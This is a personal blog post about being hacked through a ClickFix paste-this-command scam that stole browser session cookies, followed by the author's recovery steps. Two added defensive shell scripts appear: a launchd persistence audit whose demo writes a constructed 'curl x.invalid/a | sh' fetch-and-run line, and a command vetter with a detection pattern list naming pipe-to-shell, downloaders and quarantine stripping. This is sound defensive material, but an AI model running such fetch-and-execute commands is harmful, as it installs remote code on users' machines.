Hello reader,
A few weeks back, I was hacked, and almost all of my login credentials were compromised.
My Instagram was hacked, my Reddit and LinkedIn accounts were restricted, someone ordered a $400 camera lens from my Amazon account, and my Uber account was used to gift a $170 gift card.
Very interesting experience, to say the least.
I almost didn’t want to share this experience, because I was a little embarrassed. I like to think that I have a good sense of technology, and I thought I wouldn’t really be hacked, like ever.
But I was. It was scary for a bit, but somehow I was able to overcome it.
I am sharing the story here because I think it could help somebody else at some point in time.
This post is a summary of what happened, the mistakes I made, and how I fixed it (almost).
How did it happen?
The hack began when I went on the internet to download something. I am usually pretty careful when I’m on the internet, but this particular time, I was in a rush to complete something I was working on.
So I went to a site and tried to download something. I was redirected to a page that had a command that was supposed to help me download the file using the terminal, which would definitely be faster.
I have installed apps and files through the terminal before, and they have been safe. But every time, I had checked what the command was.
But this time, since I was in a rush, I just assumed that the command would be okay. So I copied the command, pasted it in my terminal, and launched it.
I was prompted for my admin password, and I should’ve hard rebooted my computer right then, but I entered the password, and that’s where the problem began.
Although the command appeared to have the file I was looking for, it actually installed a bunch of silent malware.
For about a week after I ran that command, nothing happened. Then someone posted an Instagram story from my account, some crypto thing, which I’d definitely not do.
A friend texted me, so I was able to immediately secure that account.
After a day or two, I got an email saying my Reddit account was restricted. Very interesting because I never use Reddit. I recovered and secured that, too. Then, my Amazon account was used to place an order.
That is when I realized what had actually happened.
The hack that I fell for is called ClickFix. A page tells you to paste a safe-looking terminal command to "fix" or "download" something; the command actually installs malware that silently collects what your browser has stored, saved passwords and, more importantly, the session cookies that keep you logged in, and sends them to the attacker.
Why is this so effective?
An account can have several layers of protection: a verification link, two-step verification, or even the new passkeys. But all of those are only checked at the moment you log in.
Once you’re logged in, the site hands your browser a session cookie (or token), and the browser sends it along with every request. That is why you don’t have to log in again for days or weeks: the cookie is the proof that you already passed the checks.
This means that if someone steals those cookies, they don’t need your password, your second factor, or your passkey. They can load the cookies into their own browser and pick up your sessions as you, without ever being asked to verify anything.
Incredible.
My defence
After researching a bunch, I realized that the first thing I’d have to do was monitor the incoming and outgoing network requests from my computer. I used an app called LuLu, which did a good job at that.
I was able to find most of the installed daemons (a daemon is a program that runs as a background process, rather than under the direct control of an interactive user), but I still couldn’t get everything.
Even if I tried resetting my passwords from the current computer, it wouldn’t help because the new password could also be compromised.
I knew I would have to totally wipe my computer and not try to recover anything from my current setup, since anything could have the malware.
So that’s what I did. I wiped out my entire computer and set it all up from the beginning.
Then I reset all my passwords, but for some of the things, it was probably too late. I’m still trying to recover my restricted LinkedIn account. If it doesn’t work, I may have to start all over again there.
Also, I didn’t lose any money because I was able to mark the Uber transaction as fraudulent and got a new credit card.
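One way to hunt for the background items a network monitor alone will not show, given here as an added example rather than the author's own steps or LuLu's code: snapshot every launchd item (on a real Mac the plists under ~/Library/LaunchAgents, /Library/LaunchAgents and /Library/LaunchDaemons) together with the program it runs, and diff that snapshot against one taken on a known-good machine. The plists in the demo are constructed; the directories are assumptions about where persistence lives on macOS.

```shell
#!/bin/sh
# Snapshot-and-diff audit of launchd persistence on macOS.
# Added example, not from the original post and not LuLu's own logic.
# Assumptions: launch items are XML plists in the directories passed in
# (real Mac: ~/Library/LaunchAgents, /Library/LaunchAgents, /Library/LaunchDaemons);
# the sample plists written by demo_launch_audit are constructed.

# Print the program a launchd plist runs: the Program string, or the
# ProgramArguments strings joined with spaces. Plain text parsing, no plutil needed.
launch_item_program() {
  awk '
    /<key>ProgramArguments<\/key>/ { inargs = 1; next }
    /<key>Program<\/key>/          { wantprog = 1; next }
    inargs && /<\/array>/          { exit }
    (inargs || wantprog) && /<string>/ {
      line = $0
      gsub(/.*<string>|<\/string>.*/, "", line)
      out = (out == "" ? line : out " " line)
      if (wantprog) exit
    }
    END { print out }
  ' "$1"
}

# sha256 of a file, using whichever tool the platform provides.
file_sha256() {
  if command -v sha256sum >/dev/null 2>&1; then sha256sum "$1" | cut -d' ' -f1
  else shasum -a 256 "$1" | cut -d' ' -f1; fi
}

# One line per launch item: path, hash of the plist, program it runs.
# Save this once on a clean machine and diff against it whenever something feels off.
snapshot_launch_items() {
  for dir in "$@"; do
    [ -d "$dir" ] || continue
    for plist in "$dir"/*.plist; do
      [ -f "$plist" ] || continue
      printf '%s\t%s\t%s\n' "$plist" "$(file_sha256 "$plist")" "$(launch_item_program "$plist")"
    done
  done | sort
}

# Demo on constructed plists in a temp dir: prints the diff between a baseline
# and a later snapshot after a dropper-style item has appeared.
demo_launch_audit() {
  t=$(mktemp -d)
  mkdir "$t/LaunchAgents"
  write_plist() {   # $1=path $2=label $3..=program arguments
    p=$1; l=$2; shift 2
    { printf '<?xml version="1.0" encoding="UTF-8"?>\n<plist version="1.0"><dict>\n'
      printf '<key>Label</key><string>%s</string>\n<key>ProgramArguments</key>\n<array>\n' "$l"
      for a in "$@"; do printf '<string>%s</string>\n' "$a"; done
      printf '</array>\n<key>RunAtLoad</key><true/>\n</dict></plist>\n'; } > "$p"
  }
  write_plist "$t/LaunchAgents/com.example.sync.plist" com.example.sync \
              /Applications/Sync.app/Contents/MacOS/sync --daemon
  snapshot_launch_items "$t/LaunchAgents" > "$t/baseline.txt"
  # ...a week later a new item shows up that just fetches a script and pipes it to sh:
  write_plist "$t/LaunchAgents/com.example.updater.plist" com.example.updater \
              /bin/sh -c 'curl x.invalid/a | sh'
  snapshot_launch_items "$t/LaunchAgents" > "$t/later.txt"
  diff "$t/baseline.txt" "$t/later.txt" || true   # diff exits 1 when files differ
  rm -rf "$t"
}

demo_launch_audit
```

Every `>` line in the diff is a launch item that was not there in the baseline, and the third column tells you what it executes; an entry whose hash changed is just as interesting as a new one, since a modified plist can point an existing, trusted-looking label at a different binary.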
Lessons
I am never going to execute a command in my terminal without understanding what it would do. When I run a command, I am definitely not entering my administrator password unless the source is trusted.
I’m hoping this will help me not get myself into a weird situation again.
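Putting that lesson, and the description of the ClickFix command above, into something you can actually run: the shell function below is an added example (not the author's) that inspects a pasted one-liner without executing it. It decodes any base64 blob, since ClickFix pages often hide the real command that way, and flags pipe-to-shell, downloaders, sudo, and a few macOS-specific tricks. The command in the test is constructed, and the pattern list is my assumption about what such one-liners usually contain, not a complete rule.

```shell
#!/bin/sh
# vet_command: inspect a pasted one-liner WITHOUT executing it.
# Added example, not from the original post. It reveals base64-encoded payloads
# and flags patterns a "download helper" has no business containing. The pattern
# list is an assumption about typical ClickFix-style one-liners, not an exhaustive rule.
# Usage: vet_command 'echo <b64> | base64 -d | sh'   # prints findings, returns 1 if flagged
vet_command() {
  vc_cmd=$1
  vc_flags=0
  vc_text=$vc_cmd

  # 1. Decode every base64 blob of 20+ chars and add it to the text we judge,
  #    so a hidden "curl ... | sh" is assessed by what it really does.
  for vc_tok in $(printf '%s' "$vc_cmd" | tr -c 'A-Za-z0-9+/=' '\n' | grep -E '^[A-Za-z0-9+/]{20,}={0,2}$' || true); do
    # GNU/newer macOS base64 take -d; older macOS base64 takes -D
    vc_dec=$(printf '%s' "$vc_tok" | base64 -d 2>/dev/null || printf '%s' "$vc_tok" | base64 -D 2>/dev/null || true)
    vc_dec=$(printf '%s' "$vc_dec" | LC_ALL=C tr -cd '[:print:]')   # keep only readable bytes
    if [ -n "$vc_dec" ]; then
      printf 'decoded base64: %s\n' "$vc_dec"
      vc_text="$vc_text
$vc_dec"
    fi
  done

  # 2. Red flags: pipe-to-shell, downloaders, sudo, decoding, eval, and macOS tricks
  #    (AppleScript, stripping the quarantine attribute, dropping launch items).
  for vc_pat in '\|[[:space:]]*(ba|z)?sh' 'curl|wget' 'base64' 'sudo' 'eval' \
                'osascript' 'xattr[[:space:]]+-[a-z]*d' 'chmod[[:space:]]+\+x' \
                'LaunchAgents|LaunchDaemons' 'nohup'; do
    if printf '%s\n' "$vc_text" | grep -Eq "$vc_pat"; then
      printf 'flag: %s\n' "$vc_pat"
      vc_flags=$((vc_flags + 1))
    fi
  done

  [ "$vc_flags" -eq 0 ]   # exit status 0 means nothing suspicious was seen
}
```

Run it on the exact text the page asked you to paste, before you paste it: a flagged result does not prove the command is malicious, but a "download helper" that decodes a hidden payload, fetches a script and pipes it straight into sh, then asks for your administrator password, is not something to run in a hurry.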
Very interesting experience indeed.
I’ll see you next week.
Warmly,
Suraj

